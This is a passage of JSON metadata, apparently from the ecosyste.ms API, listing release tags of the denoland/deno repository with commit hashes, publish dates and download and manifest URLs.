v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:5